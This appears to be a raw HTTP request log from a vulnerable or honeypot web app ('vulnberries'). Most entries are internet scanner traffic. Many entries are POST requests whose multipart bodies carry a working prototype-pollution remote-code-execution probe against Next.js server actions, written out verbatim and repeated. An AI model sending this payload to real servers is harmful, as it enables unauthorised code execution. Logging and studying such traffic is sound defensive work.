Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Sec-Ch-Ua: "Chromium";v="146", "Not:A-Brand";v="24", "Google Chrome";v="146"
Referer: https://admin.vulnberries.ru/cabinet?user={id
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50698
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-20 05:22:18] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Ch-Ua: "Chromium";v="146", "Not:A-Brand";v="24", "Google Chrome";v="146"
Priority: u=1
Accept: */*
X-Forwarded-Proto: https
Accept-Encoding: gzip, deflate, br, zstd
Referer: https://admin.vulnberries.ru/cabinet?user={id
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-For: 172.253.7.118
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50698
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-20 05:22:18] === HTTP Request ===
===================
Sec-Ch-Ua: "Chromium";v="146", "Not:A-Brand";v="24", "Google Chrome";v="146"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Via: 2.0 Caddy
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Priority: u=0
Accept: text/css,*/*;q=0.1
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: style
Referer: https://admin.vulnberries.ru/cabinet?user={id
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 172.253.7.118
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50698
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-20 05:22:18] === HTTP Request ===
[2026-03-20 05:22:17] Cabinet page accessed - user_id: {id, IP: 172.30.0.12:50698
===================
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua: "Chromium";v="146", "Not:A-Brand";v="24", "Google Chrome";v="146"
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-US,en;q=0.9
X-Forwarded-Proto: https
X-Forwarded-For: 172.253.7.118
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50698
Query: user={id
Path: /cabinet
URL: /cabinet?user={id
Method: GET
[2026-03-20 05:22:17] === HTTP Request ===
===================
------WebKitFormBoundaryx80570169295--
------WebKitFormBoundaryx80570169295
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx80570169295
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 45202+true+1782447;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx80570169295
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_80570169295
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx80570169295
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:57856
Path: /api/route
URL: /api/route
Method: POST
[2026-03-20 04:49:05] === HTTP Request ===
===================
------WebKitFormBoundaryx202914188519--
------WebKitFormBoundaryx202914188519
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx202914188519
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 77801+true+2608118;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx202914188519
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx202914188519
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_202914188519
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:49350
Path: /app
URL: /app
Method: POST
[2026-03-20 04:48:53] === HTTP Request ===
===================
------WebKitFormBoundaryx278347187431--
------WebKitFormBoundaryx278347187431
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx278347187431
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 95418+true+2917135;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx278347187431
X-Nextjs-Html-Request-Id: ilovepoop_278347187431
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx278347187431
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 517
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:46126
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-20 04:48:44] === HTTP Request ===
===================
------WebKitFormBoundaryx953570606471--
------WebKitFormBoundaryx953570606471
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx953570606471
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 283966+true+3358045;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx953570606471
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_953570606471
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx953570606471
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:50044
Path: /api
URL: /api
Method: POST
[2026-03-20 04:48:36] === HTTP Request ===
===================
------WebKitFormBoundaryx1783762174195--
------WebKitFormBoundaryx1783762174195
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1783762174195
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 300993+true+5926258;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1783762174195
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1783762174195
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1783762174195
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:43250
Path: /_next
URL: /_next
Method: POST
[2026-03-20 04:48:21] === HTTP Request ===
[2026-03-20 04:48:04] Main page accessed - IP: 45.205.1.18:44934
===================
------WebKitFormBoundaryx110351821013--
------WebKitFormBoundaryx110351821013
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx110351821013
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 60637+true+1819876;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx110351821013
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_110351821013
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx110351821013
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:44934
Path: /
URL: /
Method: POST
[2026-03-20 04:48:04] === HTTP Request ===
[2026-03-20 03:59:29] Main page accessed - IP: 192.227.159.125:51518
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.227.159.125:51518
Path: /
URL: /
Method: GET
[2026-03-20 03:59:29] === HTTP Request ===
[2026-03-20 03:42:03] Main page accessed - IP: 205.210.31.105:61092
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.105:61092
Path: /
URL: /
Method: GET
[2026-03-20 03:42:03] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50036
Path: /settings.py.bak
URL: /settings.py.bak
Method: GET
[2026-03-20 03:19:52] === HTTP Request ===
===================
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.184.76.206:41015
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-20 03:13:13] === HTTP Request ===
[2026-03-20 03:10:37] Main page accessed - IP: 91.230.168.80:59619
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.80:59619
Path: /
URL: /
Method: GET
[2026-03-20 03:10:37] === HTTP Request ===
[2026-03-20 02:08:04] Main page accessed - IP: 176.65.149.45:52026
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:52026
Path: /
URL: /
Method: GET
[2026-03-20 02:08:04] === HTTP Request ===
[2026-03-20 01:17:44] Main page accessed - IP: 137.184.32.56:60050
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.32.56:60050
Path: /
URL: /
Method: GET
[2026-03-20 01:17:44] === HTTP Request ===
[2026-03-20 00:31:28] Main page accessed - IP: 198.235.24.253:56355
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.253:56355
Path: /
URL: /
Method: GET
[2026-03-20 00:31:28] === HTTP Request ===
===================
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.5
Sec-Fetch-Site: none
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
Referer: http://95.143.191.38:8081/
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: navigate
Sec-Gpc: 1
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.248.20.30:45426
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-20 00:25:46] === HTTP Request ===
[2026-03-20 00:25:46] Main page accessed - IP: 104.248.20.30:45414
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Sec-Gpc: 1
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "Linux"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.248.20.30:45414
Path: /
URL: /
Method: GET
[2026-03-20 00:25:46] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 176.65.134.3:24730
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-03-19 23:29:57] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:50806
Path: /jars
URL: /jars
Method: GET
[2026-03-19 21:46:46] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.123:11804
Path: /q11ep751n43rgpj7
URL: /q11ep751n43rgpj7
Method: GET
[2026-03-19 21:00:41] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.123:21070
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-19 21:00:25] === HTTP Request ===
[2026-03-19 21:00:24] Login page accessed - IP: 66.132.153.123:21050
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.123:21050
Path: /login
URL: /login
Method: GET
[2026-03-19 21:00:24] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.38:33698
Path: /wiki
URL: /wiki
Method: GET
[2026-03-19 20:59:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.38:33676
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-19 20:59:09] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.172.38:33668
Path: *
URL: *
Method: PRI
[2026-03-19 20:59:09] === HTTP Request ===
[2026-03-19 20:59:09] Main page accessed - IP: 66.132.172.38:33652
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.38:33652
Path: /
URL: /
Method: GET
[2026-03-19 20:59:09] === HTTP Request ===
[2026-03-19 20:59:01] Login page accessed - IP: 167.94.138.192:8222
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.192:8222
Path: /login
URL: /login
Method: GET
[2026-03-19 20:59:01] === HTTP Request ===
[2026-03-19 18:29:22] Main page accessed - IP: 121.43.119.83:41964
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 121.43.119.83:41964
Path: /
URL: /
Method: GET
[2026-03-19 18:29:22] === HTTP Request ===
[2026-03-19 18:29:22] Main page accessed - IP: 121.43.119.83:41948
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.119.83:41948
Path: /
URL: /
Method: GET
[2026-03-19 18:29:22] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.119.83:41282
Path: /evox/about
URL: /evox/about
Method: GET
[2026-03-19 18:29:12] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.119.83:41268
Path: /HNAP1
URL: /HNAP1
Method: GET
[2026-03-19 18:29:12] === HTTP Request ===
[2026-03-19 18:29:11] Main page accessed - IP: 121.43.119.83:41244
===================
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; mcafee-epo-agent)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.119.83:41244
Path: /
URL: /
Method: GET
[2026-03-19 18:29:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.119.83:41250
Path: /nmaplowercheck1773944951
URL: /nmaplowercheck1773944951
Method: GET
[2026-03-19 18:29:11] === HTTP Request ===
[2026-03-19 18:29:11] Main page accessed - IP: 121.43.119.83:41210
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.119.83:41210
Path: /
URL: /
Method: GET
[2026-03-19 18:29:11] === HTTP Request ===
===================
Body: <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Content-Length: 441
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.119.83:41180
Path: /sdk
URL: /sdk
Method: POST
[2026-03-19 18:29:11] === HTTP Request ===
[2026-03-19 18:29:04] Main page accessed - IP: 121.43.119.83:40592
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.119.83:40592
Path: /
URL: /
Method: GET
[2026-03-19 18:29:04] === HTTP Request ===
===================
------WebKitFormBoundaryx1914274350717--
------WebKitFormBoundaryx1914274350717
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1914274350717
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 305396+true+6268171;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1914274350717
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1914274350717
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1914274350717
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:60648
Path: /api/route
URL: /api/route
Method: POST
[2026-03-19 17:47:50] === HTTP Request ===
===================
------WebKitFormBoundaryx1867493176961--
------WebKitFormBoundaryx1867493176961
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1867493176961
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 274304+true+6808115;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1867493176961
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1867493176961
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1867493176961
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:60646
Path: /app
URL: /app
Method: POST
[2026-03-19 17:47:44] === HTTP Request ===
===================
------WebKitFormBoundaryx1052522274415--
------WebKitFormBoundaryx1052522274415
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1052522274415
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 202423+true+5199618;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1052522274415
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1052522274415
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1052522274415
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:42064
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-19 17:47:38] === HTTP Request ===
===================
------WebKitFormBoundaryx496360270883--
------WebKitFormBoundaryx496360270883
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx496360270883
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 254051+true+1953782;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx496360270883
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_496360270883
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx496360270883
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:53578
Path: /api
URL: /api
Method: POST
[2026-03-19 17:47:31] === HTTP Request ===
===================
------WebKitFormBoundaryx581663287906--
------WebKitFormBoundaryx581663287906
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx581663287906
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 341285+true+1704333;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx581663287906
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_581663287906
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx581663287906
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:53574
Path: /_next
URL: /_next
Method: POST
[2026-03-19 17:47:25] === HTTP Request ===
[2026-03-19 17:47:19] Main page accessed - IP: 45.205.1.18:36148
===================
------WebKitFormBoundaryx953421816673--
------WebKitFormBoundaryx953421816673
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx953421816673
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 258336+true+3690627;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx953421816673
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_953421816673
X-Nextjs-Request-Id: poop1234
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx953421816673
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:36148
Path: /
URL: /
Method: POST
[2026-03-19 17:47:19] === HTTP Request ===
===================
X-Forwarded-For: 79.139.135.199
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Language: en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35844
Path: /static/salary.js
URL: /static/salary.js
